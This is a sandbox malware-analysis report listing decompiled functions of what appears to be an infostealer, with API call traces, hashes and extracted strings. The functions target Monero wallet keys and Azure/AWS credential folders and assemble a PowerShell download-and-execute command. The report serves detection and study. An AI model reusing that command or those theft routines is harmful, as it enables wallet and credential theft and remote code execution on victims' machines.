                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2428362635-0
                        • Opcode ID: 77e30ff87d6a767762ae10705f66342c0b08179b255cbd1da577966f09ca58e0
                        • Instruction ID: 9f8b9fa4af58da532e39465d0ced55120951078cf4e1becd5b348cad4cf66a50
                        • Opcode Fuzzy Hash: 77e30ff87d6a767762ae10705f66342c0b08179b255cbd1da577966f09ca58e0
                        • Instruction Fuzzy Hash: 4102C370A106059BDB25EF79C999AAFBBF5AF04301F44412AFC05A3351DB78DC49CBA8
                        Function 00441190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00441120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00441135
                          • Part of subcall function 00441120: RtlAllocateHeap.NTDLL(00000000), ref: 0044113C
                          • Part of subcall function 00441120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00441159
                          • Part of subcall function 00441120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00441173
                          • Part of subcall function 00441120: RegCloseKey.ADVAPI32(?), ref: 0044117D
                        • lstrcat.KERNEL32(?,00000000), ref: 004411C0
                        • lstrlen.KERNEL32(?), ref: 004411CD
                        • lstrcat.KERNEL32(?,.keys), ref: 004411E8
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044121F
                        • lstrlen.KERNEL32(015892A8), ref: 0044122D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441251
                        • lstrcat.KERNEL32(00000000,015892A8), ref: 00441259
                        • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00441264
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441288
                        • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00441294
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004412BA
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004412FF
                        • lstrlen.KERNEL32(0158D250), ref: 0044130E
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441335
                        • lstrcat.KERNEL32(00000000,?), ref: 0044133D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441378
                        • lstrcat.KERNEL32(00000000), ref: 00441385
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004413AC
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 004413D5
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441401
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044143D
                          • Part of subcall function 0045EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0045EE12
                        • DeleteFileA.KERNEL32(?), ref: 00441471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                        • String ID: .keys$\Monero\wallet.keys
                        • API String ID: 2881711868-3586502688
                        • Opcode ID: d6dda6527dcc810e4c919635b014ce55c0960520359f06e65019bd5efb740767
                        • Instruction ID: 31226ea4c12220b8bfbd0b1557ea3df5e5b5c818321cfac280359fa3cf5bb24d
                        • Opcode Fuzzy Hash: d6dda6527dcc810e4c919635b014ce55c0960520359f06e65019bd5efb740767
                        • Instruction Fuzzy Hash: 00A1C971B102059BEB21EF75DD49A9FB7B9AF44304F44006AF805E7351DB78DD818BA8
                        Function 0045E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0045E740
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0045E769
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E79F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E7AD
                        • lstrcat.KERNEL32(?,\.azure\), ref: 0045E7C6
                        • memset.MSVCRT ref: 0045E805
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0045E82D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E85F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E86D
                        • lstrcat.KERNEL32(?,\.aws\), ref: 0045E886
                        • memset.MSVCRT ref: 0045E8C5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0045E8F1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E920
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E92E
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0045E947
                        • memset.MSVCRT ref: 0045E986
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$memset$FolderPathlstrcpy
                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 4067350539-3645552435
                        • Opcode ID: 44e52f372c4d9dcdbd8ac8640bd13bf6b68483857bb8386c679047c7c93c8518
                        • Instruction ID: 9737acb40bdb0ac69c1909aa179f5dea9d64c4b3942eeeb747ffba0674f66d6a
                        • Opcode Fuzzy Hash: 44e52f372c4d9dcdbd8ac8640bd13bf6b68483857bb8386c679047c7c93c8518
                        • Instruction Fuzzy Hash: 18713B71A50218ABD725EB74CC46FED7374AF48300F50049DBA19AB1C1DFB89B848B6C
                        Function 0045ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32 ref: 0045ABCF
                        • lstrlen.KERNEL32(0158DFC8), ref: 0045ABE5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AC0D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045AC18
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AC41
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AC84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045AC8E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ACB7
                        • lstrlen.KERNEL32(00474AD4), ref: 0045ACD1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ACF3
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 0045ACFF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AD28
                        • lstrlen.KERNEL32(00474AD4), ref: 0045AD3A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AD5C
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 0045AD68
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AD91
                        • lstrlen.KERNEL32(0158E088), ref: 0045ADA7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ADCF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045ADDA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AE03
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045AE3F
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045AE49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AE6F
                        • lstrlen.KERNEL32(00000000), ref: 0045AE85
                        • lstrcpy.KERNEL32(00000000,0158E1C0), ref: 0045AEB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen
                        • String ID: f
                        • API String ID: 2762123234-1993550816
                        • Opcode ID: 6c32dc3611acdb729c43e66eeb5734396170d8f5a0c43ec185547ddcaa1b9afe
                        • Instruction ID: 3b98b8fee8b08e2680d1e2eb510874e3caebf7c354221d2cd410296cb60b066e
                        • Opcode Fuzzy Hash: 6c32dc3611acdb729c43e66eeb5734396170d8f5a0c43ec185547ddcaa1b9afe
                        • Instruction Fuzzy Hash: 5AB1B230A101169BDB22EF74CD496AFB3B6AF04306F44052ABC05A7352DB78DD58CBA9
                        Function 004647E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(ws2_32.dll,?,004572A4), ref: 004647E6
                        • GetProcAddress.KERNEL32(00000000,connect), ref: 004647FC
                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0046480D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0046481E
                        • GetProcAddress.KERNEL32(00000000,htons), ref: 0046482F
                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00464840
                        • GetProcAddress.KERNEL32(00000000,recv), ref: 00464851
                        • GetProcAddress.KERNEL32(00000000,socket), ref: 00464862
                        • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00464873
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00464884
                        • GetProcAddress.KERNEL32(00000000,send), ref: 00464895
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                        • API String ID: 2238633743-3087812094
                        • Opcode ID: 16c1ead5e4bcf3e0d24f6db64e3fa23a31f1c8f245da1c2d9e414a0139f92a12
                        • Instruction ID: 4397553f777064f89d6d7fe8c4c8305caf1deed46715ad793bf221b518147af5
                        • Opcode Fuzzy Hash: 16c1ead5e4bcf3e0d24f6db64e3fa23a31f1c8f245da1c2d9e414a0139f92a12
                        • Instruction Fuzzy Hash: 7C11E271DE1710AF87189F74AC0DB993AFAFA0670A364691BF05DD7160DBF84480DB64
                        Function 0045BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045BE53
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045BE86
                        • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0045BE91
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045BEB1
                        • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0045BEBD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BEE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045BEEB
                        • lstrlen.KERNEL32(')"), ref: 0045BEF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BF13
                        • lstrcat.KERNEL32(00000000,')"), ref: 0045BF1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BF46
                        • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0045BF66
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045BF88
                        • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0045BF94
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BFBA
                        • ShellExecuteEx.SHELL32(?), ref: 0045C00C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 4016326548-898575020
                        • Opcode ID: bfd26c14a3f312be1332fd1d0260c22af12d81b14cd0c9d0f8abce6204bef9da
                        • Instruction ID: c6a12710bf2c43f213bfced6bf5015f792c717651b4aa48b8feffeac49167452
                        • Opcode Fuzzy Hash: bfd26c14a3f312be1332fd1d0260c22af12d81b14cd0c9d0f8abce6204bef9da
                        • Instruction Fuzzy Hash: E761D731A10205AFDB11AFB58D896AFBBA5EF04305F44542BFC09E3352DB7CC8458BA9
                        Function 00461820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0046184F
                        • lstrlen.KERNEL32(015772C8), ref: 00461860
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461887
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461892
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004618C1
                        • lstrlen.KERNEL32(00474FA0), ref: 004618D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004618F4
                        • lstrcat.KERNEL32(00000000,00474FA0), ref: 00461900
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046192F
                        • lstrlen.KERNEL32(01577398), ref: 00461945
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046196C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461977
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004619A6
                        • lstrlen.KERNEL32(00474FA0), ref: 004619B8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004619D9
                        • lstrcat.KERNEL32(00000000,00474FA0), ref: 004619E5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461A14
                        • lstrlen.KERNEL32(015773A8), ref: 00461A2A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461A51
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461A5C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461A8B
                        • lstrlen.KERNEL32(015773C8), ref: 00461AA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461AC8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461AD3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461B02
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen
                        • String ID:
                        • API String ID: 1049500425-0
                        • Opcode ID: d1bbb898f86867554aef1eccf5807a906dd7dc260a65cd096ba2cdfefa4cbec0
                        • Instruction ID: bd33897a7699488d996f1c08ca1d64e9c3e4a4368df7555aa3e8687413cd542e
                        • Opcode Fuzzy Hash: d1bbb898f86867554aef1eccf5807a906dd7dc260a65cd096ba2cdfefa4cbec0
                        • Instruction Fuzzy Hash: 279133B06017039FD720AFB5DD88A17B7E9AF04344B58582EB886D3361EB78DC45CB65
                        Function 00454760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454793
                        • LocalAlloc.KERNEL32(00000040,?), ref: 004547C5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454812
                        • lstrlen.KERNEL32(00474B60), ref: 0045481D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045483A
                        • lstrcat.KERNEL32(00000000,00474B60), ref: 00454846
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045486B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454898
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004548A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004548CA
                        • StrStrA.SHLWAPI(?,00000000), ref: 004548DC
                        • lstrlen.KERNEL32(?), ref: 004548F0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454931
                        • lstrcpy.KERNEL32(00000000,?), ref: 004549B8
                        • lstrcpy.KERNEL32(00000000,?), ref: 004549E1
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454A0A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454A30
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454A5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 4107348322-3310892237
